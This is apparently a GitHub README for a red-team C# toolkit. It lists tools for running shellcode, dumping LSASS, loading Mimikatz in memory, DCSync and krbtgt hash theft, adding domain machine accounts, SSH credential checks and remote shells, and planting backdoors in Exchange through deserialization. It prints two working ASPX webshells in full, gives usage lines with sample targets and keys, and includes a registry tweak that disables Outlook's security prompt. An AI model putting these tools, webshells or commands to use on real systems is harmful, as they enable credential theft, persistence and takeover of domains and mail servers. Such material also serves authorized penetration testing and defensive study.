Homework-of-C-Sharp
C Sharp codes of my blog.
Shellcode.cs
Use CreateThread to run shellcode.
ShellcodeBase64.txt
Base64 of the shellcode(msfvenom -p windows/x64/exec CMD=calc.exe EXITFUNC=thread -f csharp)
ReadShellcode.cs
It will read ShellcodeBase64.txt and launch the shellcode.
DumpLsass.cs
Source code is https://github.com/GhostPack/SafetyKatz
Remove some functions of the source code,only used of dumping lsass.exe to the current path.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe DumpLsass.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe DumpLsass.cs
SafetyKatz.cs
Use to run sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file of lsass.exe.
All code from https://github.com/GhostPack/SafetyKatz
I just modified a few lines of code so that it can be compiled by csc.exe.
Eg.
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SafetyKatz.cs /unsafe
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SafetyKatz.cs /unsafe
GzipandBase64.cs
Use to generate the KatzCompressed string in PELoaderofMimikatz.cs
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe GzipandBase64.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe GzipandBase64.cs
PELoaderofMimikatz.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe PELoaderofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe PELoaderofMimikatz.cs
DcsyncofMimikatz.cs
This is the dcsync mode extracted from Mimikatz.
The source code in KatzCompressed is https://github.com/3gstudent/test/blob/master/Mimkatz-dcsync.zip
You can use https://github.com/3gstudent/Homework-of-C-Sharp/blob/master/GzipandBase64.cs to generate the KatzCompressed string.
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe DcsyncofMimikatz.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe DcsyncofMimikatz.cs
Usage:
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /all /csv" exit
DcsyncofMimikatz.exe log "lsadump::dcsync /domain:test.com /user:administrator /csv" exit
SharpMimikatz_x86.cs
Reference:Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
This is a 32-bit version.
Complie:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
or
C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /unsafe /platform:x86 SharpMimikatz_x86.cs
Usage:
SharpMimikatz_x86.exe coffee exit
SharpMimikatz_x64.cs
Reference:Casey Smith's PELoader.cs
The source file is Casey Smith's PELoader.cs and the version of mimikatz is mimikatz 2.0 alpha (x64) release "Kiwi en C" (Aug 17 2015 00:14:48).
I change it to the new version(mimikatz 2.1.1 (x64) built on Sep 25 2018 15:08:14).
The source code supprot 4.0 or later.
This code supprot 3.5 or later.
This is a 64-bit version.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe /unsafe /platform:x64 SharpMimikatz_x64.cs
Usage:
SharpMimikatz_x64.exe coffee exit
SharpPELoaderGenerater.cs
Use to generate SharpPELoader.cs
Modified by 3gstudent
Reference:Casey Smith's PELoader.cs
Usage:
SharpPELoaderGenerater.exe <exe path>
Eg.
SharpPELoaderGenerater.exe mimikatz.exe
SharpPELoaderGenerater will determine whether the exe is 32-bit or 64-bit and then generate the corresponding code.
More details:
《通过.NET实现内å˜åŠ è½½PE文件》
AddMachineAccountofDomain.cs
Reference:https://github.com/pkb1s/SharpAllowedToAct
This code is just part of SharpAllowedToAct.
It can be used to add a Machine Account(User:testNew,Password:123456789).
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe AddMachineAccountofDomain.cs /r:System.DirectoryServices.dll,System.DirectoryServices.Protocols.dll
mapi_tool.cs
Use MAPI to manage Outlook.
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe mapi_tool.cs /r:Microsoft.Office.Interop.Outlook.dll
Usage:
mapi_tool.exe GetAllFolders
mapi_tool.exe GetConfig
mapi_tool.exe ListMail <folder>
mapi_tool.exe ListUnreadMail <folder>
Ex command:
mapi_tool.exe GetConfigEx
mapi_tool.exe GetContactsEx
mapi_tool.exe GetGlobalAddressEx
mapi_tool.exe ListMailEx <folder>
mapi_tool.exe ListUnreadMailEx <folder>
mapi_tool.exe SaveAttachment <folder> <EntryID>
<folder>:Inbox/Drafts/SentItems/DeletedItems/Outlook/JunkEmail
Note:
When the antivirus software is inactive or out-of-date,running Ex command will pop up a Outlook security prompt.
You can modify the registry to turn off the Outlook security prompt.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\x.0\Outlook\Security,DWORD:ObjectModelGuard,2
Office14-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll
Use for Outlook 2010.
Office15-Microsoft.Office.Interop.OutlookMicrosoft.Office.Interop.Outlook.dll
Use for Outlook 2013.
BrailleToASCII.cs
Use to translate Braille Patterns to ASCII characters.
Support:1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ),!/-.?;'$
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe BrailleToASCII.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe BrailleToASCII.cs
SSLCertScan
Use to scan the website SSL certificate.
Reference:https://github.com/ryanries/SharpTLSScan
This code can be complied by csc.exe or Visual Studio.
Supprot .Net 3.5 or later.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SSLCertScan.cs
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SSLCertScan.cs
SharpSSHCheck_SSH.NET.cs
Use to check the valid credential of SSH(Based on SSH.NET).
Support password and privatekeyfile.
Reference:https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHCheck_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHCheck_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password>
<mode>:
- plaintext
- keyfile
Eg:
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 plaintext root toor
SharpSSHCheck_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa
SharpSSHRunCmd_SSH.NET
Remote command execution via SSH(Based on SSH.NET).
Support password and privatekeyfile.
Reference:https://github.com/sshnet/SSH.NET
Note:
You need to reference Renci.SshNet.dll.
You can download Renci.SshNet.dll from https://github.com/sshnet/SSH.NET/releases/download/2016.1.0/SSH.NET-2016.1.0-bin.zip
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpSSHRunCmd_SSH.NET.cs /r:Renci.SshNet.dll
Usage:
SharpSSHRunCmd_SSH.NET.exe <SSH ServerIP> <SSH ServerPort> <mode> <user> <password> <cmd>
<mode>:
- plaintext
- keyfile
If the <cmd> is shell,you will get an interactive shell.
Eg:
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 plaintext root toor shell
SharpSSHRunCmd_SSH.NET.exe 192.168.1.1 22 keyfile root id_rsa ps
ListUserMailbyLDAP
Use to export all users' mail by LDAP.
Modified from https://github.com/Mr-Un1k0d3r/RedTeamCSharpScripts/blob/master/enumerateuser.cs
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe ListUserMailbyLDAP.cs /r:System.DirectoryServices.dll
Usage:
ListUserMailbyLDAP <LDAP ServerIP> <user> <password>
Eg:
ListUserMailbyLDAP.exe 192.168.1.1 test1 password1
List_passwordneverexpires_user_byLDAP
Use to export all users with password_never_expires by LDAP.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe List_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
List_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password>
Eg:
List_passwordneverexpires_user_byLDAP.exe 192.168.1.1 test1 password1
Add_passwordneverexpires_user_byLDAP
Use to set the selected user with password_never_expires by LDAP.
Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Add_passwordneverexpires_user_byLDAP.cs /r:System.DirectoryServices.dll
Usage:
Add_passwordneverexpires_user_byLDAP <LDAP ServerIP> <user> <password> <target user>
Eg:
Add_passwordneverexpires_user_byLDAP.exe 192.168.1.1 administrator password1 test1
SqlClient.cs
From:https://github.com/FortyNorthSecurity/SqlClient
Use to query the MSSQL database.
Complie:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SqlClient.cs
or
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SqlClient.cs
SharpADFindDemo.cs
Use to export the AD data by LDAP. Complie:
C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
or
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe SharpADFindDemo.cs /r:System.DirectoryServices.dll
Usage:
SharpADFindDemo <LDAP ServerIP> <user> <password> <command>
command:
- user
- machine
- group
- ou
- username
- machinename
- groupname
- ouname
Note:The maxsize is 1000.
Eg:
SharpADFindDemo.exe 192.168.1.1 test1 password1 user
SharpExchangeBackdoor.cs
Python Version: SharpExchangeBackdoor.py
Use to send payload to the Exchange webshell backdoor.
Support:
- assemblyLoad
- webshellWrite
Usage:
<url> <user> <password> <mode> <path>
mode:
assemblyLoad
webshellWrite
eg.
SharpExchangeBackdoor.exe https://192.168.1.1/owa/auth/errorFE.aspx no auth assemblyLoad payload.dll
SharpExchangeBackdoor.exe https://192.168.1.1/ecp/About.aspx user1 123456 webshellWrite payload.aspx
assemblyLoad.aspx:
<%@ Page Language="C#" %><%System.Reflection.Assembly.Load(Convert.FromBase64String(Request.Form["demodata"])).CreateInstance("Payload").Equals("");%>
webshellWrite.aspx:
<%@ Page Language="C#" %><%if (Request.Files.Count!=0)Request.Files[0].SaveAs(Server.MapPath("./uploadDemo.aspx"));}%>
XamlToViewState.cs
Use to create viewstate from XAML file
Usage:
<xaml path> <generator> <key>
eg.
XamlToViewState.exe Run-Calc.xml 042A94E8 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF
SerializeXamlToViewState.cs
Use to create viewstate from Serialize Xaml data.
SharpExchangeDeserializeShell-NoAuth-Fromzcgonvh.cs
SharpExchangeDeserializeShell-NoAuth-ActivitySurrogateSelectorFromFile.cs
SharpExchangeDeserializeShell-NoAuth-ghostfile.cs
Code from https://github.com/zcgonvh/CVE-2020-0688/blob/master/ExchangeCmd.cs
Use to test the deserializing code execution of Exchange.
From read and write permissions of Exchange files to deserializing code execution.
You should modify the machineKey in %ExchangeInstallPath%\FrontEnd\HttpProxy<path>\web.config to implement deserializing code execution.
<path>:owa or ecp
Usage:
<url> <key> <path>
eg.
192.168.1.1 CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF owa
mail.test.com CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF ecp
SharpExchangeDumpHash.cs
Use to send payload to the Exchange webshell backdoor. The communication is encrypted by AES.
Support function:
- generate : generate the webshell
- dumplsass: save the dump file of LSASS to C:\Windows\Temp\lsass.bin
- parsedump: use mimikatz to load C:\Windows\Temp\lsass.bin and save the results to C:\Windows\Temp\mimikatz.log
Usage:
<url> <user> <password> <mode>
mode:
- generate
- dumplsass
- parsedump
eg.
SharpExchangeDumpHash.exe https://192.168.1.1/owa/auth/1.aspx no auth dumplsass
SharpExchangeDumpHash.exe https://192.168.1.1/ecp/Education.aspx user1 123456 parsedump
SharpDCSync_krbtgt.cs
Use DRSR protocol to ask a domain controller to get the krbtgt's hash.
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
SharpDCSync.cs
use DRSR protocol to ask a domain controller to synchronize a specified entry.
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
SharpTGTImporter.cs
Use to import the TGT
Reference:https://github.com/vletoux/MakeMeEnterpriseAdmin
SharpGetUserLoginIPRPC.cs
Use RPC to get the login IP of domain users through the event log.
Support local and remote access
SharpGetUserLoginIPWMI.cs
Use WMI to get the login IP of domain users through the event log.
Support local and remote access